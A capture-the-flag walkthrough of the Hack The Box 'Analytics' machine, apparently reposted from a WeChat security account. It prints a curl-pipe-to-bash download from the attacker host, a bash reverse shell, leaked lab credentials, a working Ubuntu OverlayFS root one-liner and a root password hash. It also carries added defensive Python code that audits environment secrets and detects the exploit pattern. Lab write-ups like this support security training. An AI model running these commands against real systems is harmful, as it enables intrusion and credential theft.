HTB-Analytics(Easy)

Posted by admin on 2023-10-08 23:43:10

Scan

┌──(kali㉿kali)-[~/Desktop/htb/Analytics]
└─$ sudo nmap --min-rate 10000  10.10.11.233
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-08 09:46 EDT
Nmap scan report for 10.10.11.233
Host is up (0.34s latency).
Not shown: 696 filtered tcp ports (no-response), 302 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 3.44 seconds

┌──(kali㉿kali)-[~/Desktop/htb/Analytics]
└─$ sudo nmap -sT -sV -O -p11,80 10.10.11.233
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-08 09:51 EDT

┌──(kali㉿kali)-[~/Desktop/htb/Analytics]
└─$ sudo nmap -sT -sV -O -p22,80 10.10.11.233
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-08 09:51 EDT
Nmap scan report for 10.10.11.233
Host is up (0.34s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 - 5.3 (95%), Linux 4.15 - 5.6 (95%), Linux 3.1 (95%), Linux 3.2 (95%), Linux 5.3 - 5.4 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 3.1 - 3.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.70 seconds



Enum

Visiting port 80 shows a Metabase instance, which brings to mind the recent CVE: https://www.metabase.com/blog/security-incident-summary

A ready-made tool exists for the Metabase RCE vulnerability: https://github.com/robotmikhro/CVE-2023-38646

python3 single.py -u http://data.analytical.htb -c 'curl 10.10.14.44:8000/rev|bash'


rev file:

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.44/9001 0>&1


Escaping Docker Container

┌──(kali㉿kali)-[~/Desktop/htb/Analytics]
└─$ sudo nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.11.233] 49914
bash: cannot set terminal process group (1): Not a tty
bash: no job control in this shell
de17e0ef4ebb:/$ id
id
uid=2000(metabase) gid=2000(metabase) groups=2000(metabase),2000(metabase)
de17e0ef4ebb:/$ env
env
SHELL=/bin/sh
MB_DB_PASS=
HOSTNAME=de17e0ef4ebb
LANGUAGE=en_US:en
MB_JETTY_HOST=0.0.0.0
JAVA_HOME=/opt/java/openjdk
MB_DB_FILE=//metabase.db/metabase.db
PWD=/
LOGNAME=metabase
MB_EMAIL_SMTP_USERNAME=
HOME=/home/metabase
LANG=en_US.UTF-8
META_USER=metalytics
META_PASS=An4lytics_ds20223#
MB_EMAIL_SMTP_PASSWORD=
USER=metabase
SHLVL=5
MB_DB_USER=
FC_LANG=en-US
LD_LIBRARY_PATH=/opt/java/openjdk/lib/server:/opt/java/openjdk/lib:/opt/java/openjdk/../lib
LC_CTYPE=en_US.UTF-8
MB_LDAP_BIND_DN=
LC_ALL=en_US.UTF-8
MB_LDAP_PASSWORD=
PATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
MB_DB_CONNECTION_URI=
JAVA_VERSION=jdk-11.0.19+7
_=/usr/bin/env
de17e0ef4ebb:/$ ls -la /
ls -la /
total 96
drwxr-xr-x    1 root     root          4096 Oct  8 08:52 .
drwxr-xr-x    1 root     root          4096 Oct  8 08:52 ..
-rwxr-xr-x    1 root     root             0 Oct  8 08:52 .dockerenv
drwxr-xr-x    1 root     root          4096 Jun 29 20:40 app
drwxr-xr-x    1 root     root          4096 Jun 29 20:39 bin
drwxr-xr-x    5 root     root           340 Oct  8 08:52 dev
drwxr-xr-x    1 root     root          4096 Oct  8 08:52 etc
drwxr-xr-x    1 root     root          4096 Aug  3 12:16 home
drwxr-xr-x    1 root     root          4096 Jun 14 15:03 lib
drwxr-xr-x    5 root     root          4096 Jun 14 15:03 media
drwxr-xr-x    1 metabase metabase      4096 Aug  3 12:17 metabase.db
drwxr-xr-x    2 root     root          4096 Jun 14 15:03 mnt
drwxr-xr-x    1 root     root          4096 Jun 15 05:12 opt
drwxrwxrwx    1 root     root          4096 Aug  7 11:10 plugins
dr-xr-xr-x  354 root     root             0 Oct  8 08:52 proc
drwx------    1 root     root          4096 Aug  3 12:26 root
drwxr-xr-x    2 root     root          4096 Jun 14 15:03 run
drwxr-xr-x    2 root     root          4096 Jun 14 15:03 sbin
drwxr-xr-x    2 root     root          4096 Jun 14 15:03 srv
dr-xr-xr-x   13 root     root             0 Oct  8 08:52 sys
drwxrwxrwt    1 root     root          4096 Oct  8 09:23 tmp
drwxr-xr-x    1 root     root          4096 Jun 29 20:39 usr
drwxr-xr-x    1 root     root          4096 Jun 14 15:03 var
de17e0ef4ebb:/$


The environment gives us SSH credentials: metalytics:An4lytics_ds20223#
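The security point of that env dump is that any process inside the container, including one spawned through the Metabase RCE, can read every variable, so credentials placed there leak to whoever gets code execution. As an added example (not from the original post), a small audit that parses `env` output and flags credential-bearing variables that are actually set; the sample lines are constructed to mirror the dump above, with a placeholder value instead of the real password.

```python
import re

# Constructed sample of `env` output from a container, modelled on the dump
# above (placeholder secret; not the original value).
SAMPLE_ENV = """\
SHELL=/bin/sh
MB_DB_PASS=
HOSTNAME=de17e0ef4ebb
META_USER=metalytics
META_PASS=constructed-secret-1
MB_EMAIL_SMTP_PASSWORD=
MB_LDAP_BIND_DN=
MB_LDAP_PASSWORD=
JAVA_VERSION=jdk-11.0.19+7
"""

# Variable names that conventionally carry a credential.
SECRET_NAME = re.compile(r"(PASS(WORD)?|SECRET|TOKEN|API_?KEY|PRIVATE_?KEY)$", re.I)


def parse_env(text):
    """Parse KEY=VALUE lines into a dict; lines without '=' are ignored."""
    env = {}
    for line in text.splitlines():
        if "=" in line:
            key, value = line.split("=", 1)
            env[key] = value
    return env


def find_exposed_secrets(env):
    """Return {name: masked_value} for secret-looking variables that are set.

    Empty values (MB_DB_PASS= etc.) are not findings: nothing leaks from them.
    The value is masked so the report itself does not become a second leak.
    """
    findings = {}
    for key, value in env.items():
        if SECRET_NAME.search(key) and value:
            findings[key] = value[:2] + "*" * (len(value) - 2) if len(value) > 2 else "**"
    return findings


if __name__ == "__main__":
    for name, masked in find_exposed_secrets(parse_env(SAMPLE_ENV)).items():
        print(f"credential in environment: {name}={masked}")
```

The same check run against `docker inspect` output or a compose file catches the problem before deployment; the fix is to mount secrets as files with restricted permissions rather than exporting them.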


Root

Following this article: https://www.reddit.com/r/selfhosted/comments/15ecpck/ubuntu_local_privilege_escalation_cve20232640/

Affected Ubuntu releases: 23.04, 22.10, 22.04 (not v5.15.0), 20.04 (v5.4.0, for 32629), 18.04 (v5.4.0, for 32629)

metalytics@analytics:~$ uname -a
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
metalytics@analytics:~$ unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'
mkdir: cannot create directory ‘l’: File exists
mkdir: cannot create directory ‘u’: File exists
mkdir: cannot create directory ‘w’: File exists
mkdir: cannot create directory ‘m’: File exists
uid=0(root) gid=1000(metalytics) groups=1000(metalytics)
metalytics@analytics:~$ unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("curl 10.10.14.44:8000/rev|bash")'
mkdir: cannot create directory ‘l’: File exists
mkdir: cannot create directory ‘u’: File exists
mkdir: cannot create directory ‘w’: File exists
mkdir: cannot create directory ‘m’: File exists
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    54  100    54    0     0    107      0 --:--:-- --:--:-- --:--:--   108
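The escalation above is visible in process telemetry: an unprivileged user enters a user and mount namespace (`unshare -rm`), sets a file capability on a copied binary (`setcap cap_setuid`) and mounts an overlayfs on top. As an added detection example (not from the original post), the following scores process command lines against those indicators; the audit lines are constructed, and one of them mirrors the command shown above.

```python
import re

# Constructed process-audit events in a simplified "uid=<n> cmd=<cmdline>" form,
# standing in for what an auditd or EDR feed would record.
SAMPLE_EVENTS = [
    "uid=1000 cmd=uname -a",
    'uid=1000 cmd=unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; '
    'setcap cap_setuid+eip l/python3;mount -t overlay overlay '
    '-o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;"',
    "uid=0 cmd=mount -t overlay overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work /merged",
    "uid=1000 cmd=u/python3 -c 'import os;os.setuid(0);os.system(\"id\")'",
]

# Indicators of the overlayfs capability-copy pattern; no single one is
# malicious on its own, the combination by a non-root uid is.
INDICATORS = {
    "user_mount_namespace": re.compile(r"\bunshare\b[^|;&]*-\w*r\w*m|\bunshare\b.*--map-root-user"),
    "file_capability": re.compile(r"\bsetcap\b.*\bcap_setuid\b"),
    "overlay_mount": re.compile(r"\bmount\b.*-t\s+overlay\b"),
    "setuid_from_script": re.compile(r"setuid\(0\)"),
}


def score_event(line):
    """Return the set of indicator names matching one audit line."""
    m = re.match(r"uid=(\d+)\s+cmd=(.*)", line)
    if not m:
        return set()
    uid, cmd = int(m.group(1)), m.group(2)
    hits = {name for name, rx in INDICATORS.items() if rx.search(cmd)}
    # Root mounting an overlay is routine (container runtimes do it all day);
    # only an unprivileged uid doing it inside its own namespace is of interest.
    if uid == 0:
        hits.discard("overlay_mount")
    return hits


def find_suspicious(events, min_hits=2):
    """Flag events where at least min_hits indicators co-occur on one command line."""
    alerts = []
    for line in events:
        hits = score_event(line)
        if len(hits) >= min_hits:
            alerts.append((line, sorted(hits)))
    return alerts


if __name__ == "__main__":
    for line, hits in find_suspicious(SAMPLE_EVENTS):
        print(f"ALERT {hits}: {line[:80]}")
```

The patched kernel removes the root cause, so the alert is a compensating control for hosts still on an affected release; restricting unprivileged user namespaces (kernel.unprivileged_userns_clone or the Ubuntu AppArmor equivalent) blocks the first step outright.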



root@analytics:~# cat /etc/shadow
cat /etc/shadow
root:$y$j9T$aVUkVU8LWFNEuXdwrOIJH.$jF8hy0vMzBJTvu/.HkzP0E4ZObo1I.frOPRVj2ktqM2:19576:0:99999:7:::


Originally published on the WeChat official account 搁浅安全: HTB-Analytics(Easy)

When reposting, please keep the link to this article (CN-SEC中文网: thanks to the original author for their work): https://cn-sec.com/archives/2093848.html